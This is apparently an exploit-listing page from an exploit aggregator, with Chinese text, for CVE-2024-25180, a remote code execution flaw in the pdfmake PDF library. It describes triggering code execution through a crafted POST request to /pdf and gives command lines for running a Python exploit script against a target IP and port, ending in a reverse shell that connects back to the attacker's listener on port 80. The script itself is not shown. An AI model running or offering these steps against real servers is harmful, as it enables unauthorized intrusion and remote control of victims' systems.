Exploit for CVE-2024-25180

Name: Exploit for CVE-2024-25180
Rating: 5 (75 reviews)

2025-03-29 | CVSS 9.8

## https://sploitus.com/exploit?id=7D42EE96-998F-546C-A3D2-896E29031F23
# CVE-2024-25180

## 概述
pdfmake是一个纯 JavaScript 客户端/服务器端 PDF 打印
此软件包的受影响版本容易受到任意代码注入攻击，攻击者可以通过向路径发送精心设计的 POST 请求来执行任意代码/pdf。攻击者可以通过发送精心设计的请求在系统上执行任意代码。

CVE-2024-25180 Remote Code Execution in pdfmake

## 脚本利用
```
python3 CVE-2024-25180.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>

python3 CVE-2024-25180.py 192.168.140.42 1234 192.168.45.208 80
```
监听80端口，即可获取反弹shell

![image](https://github.com/user-attachments/assets/42e08e9e-ebe7-41c7-84f3-424558754b75)